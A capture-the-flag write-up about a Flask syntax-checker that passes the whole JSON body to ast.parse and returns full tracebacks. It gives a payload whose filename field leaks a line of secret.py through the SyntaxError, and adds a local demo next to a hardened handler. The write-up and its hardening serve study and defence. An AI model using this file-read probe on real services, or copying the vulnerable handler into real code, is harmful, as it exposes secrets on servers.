Online Python Editor

# app.py
import ast
import traceback
from flask import Flask, render_template, request

app = Flask(__name__)

@app.get("/")
def home():
    return render_template("index.html")

@app.post("/check")
def check():
    try:
        # Every key of the client's JSON body is forwarded to ast.parse as a
        # keyword argument, so the client controls `filename` as well as `source`.
        ast.parse(**request.json)
        return {"status": True, "error": None}
    except Exception:
        # The complete traceback, including the offending source line, goes back to the client.
        return {"status": False, "error": traceback.format_exc()}

if __name__ == '__main__':
    app.run(debug=True)


# secret.py
def main():
    print("Here's the flag: ")
    print(FLAG)

FLAG = "TRX{fake_flag_for_testing}"

main()


By passing secret.py as the filename argument to ast.parse, the FLAG can be leaked. When CPython builds the SyntaxError for a source string parsed in exec mode, it reads the text of the offending line from the file on disk named by `filename`, and traceback.format_exc() returns that line to the client. The five leading newlines put the unclosed `print(` on line 6, which is the line of secret.py that assigns FLAG.

https://docs.python.org/3/library/ast.html#ast.parse

{
  "source": "\n\n\n\n\nprint(",
  "filename": "secret.py"
}
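As an added example that is not from the write-up or the challenge, the /check logic is reduced to a plain function beside a hardened variant, and the same probe request is run against both; secret.py is recreated in a temporary directory with a constructed fake flag, and the function names are my own:

```python
import ast
import os
import tempfile
import traceback

# Constructed secret.py stand-in (fake flag); "# secret.py" as line 1 puts FLAG on line 6.
SECRET_PY = (
    "# secret.py\n"
    "def main():\n"
    '    print("Here\'s the flag: ")\n'
    "    print(FLAG)\n"
    "\n"
    'FLAG = "TRX{fake_flag_for_testing}"\n'
    "\n"
    "main()\n"
)
FLAG_LINE = 6

def check_vulnerable(payload):
    """The challenge's /check logic: every JSON key reaches ast.parse, full traceback returned."""
    try:
        ast.parse(**payload)
        return {"status": True, "error": None}
    except Exception:
        return {"status": False, "error": traceback.format_exc()}

def check_hardened(payload):
    """Accept only a string `source`, pin filename, return message and line number only."""
    source = payload.get("source") if isinstance(payload, dict) else None
    if not isinstance(source, str):
        return {"status": False, "error": "source must be a JSON string"}
    try:
        ast.parse(source, filename="<string>")
        return {"status": True, "error": None}
    except (SyntaxError, ValueError) as e:  # ValueError: e.g. NUL bytes in source
        # Neither e.text nor a traceback is echoed, so no file content can leak.
        return {"status": False, "error": f"line {getattr(e, 'lineno', '?')}: {getattr(e, 'msg', e)}"}

def probe_payload(filename, lineno):
    """The write-up's request: lineno-1 newlines, then an unclosed '(' whose line text CPython reads from `filename`."""
    return {"source": "\n" * (lineno - 1) + "print(", "filename": filename}

def demo():
    """Send the same probe to both handlers; returns (vulnerable_error, hardened_error)."""
    with tempfile.TemporaryDirectory() as d:
        path = os.path.join(d, "secret.py")
        with open(path, "w") as f:
            f.write(SECRET_PY)
        payload = probe_payload(path, FLAG_LINE)
        return check_vulnerable(payload)["error"], check_hardened(payload)["error"]
```

The vulnerable handler's error string contains the FLAG line read from secret.py, while the hardened one reports only the line number and message.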

